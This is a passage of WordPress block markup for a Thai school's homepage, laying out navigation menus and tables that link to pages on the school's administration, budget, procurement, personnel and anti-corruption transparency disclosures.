{\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 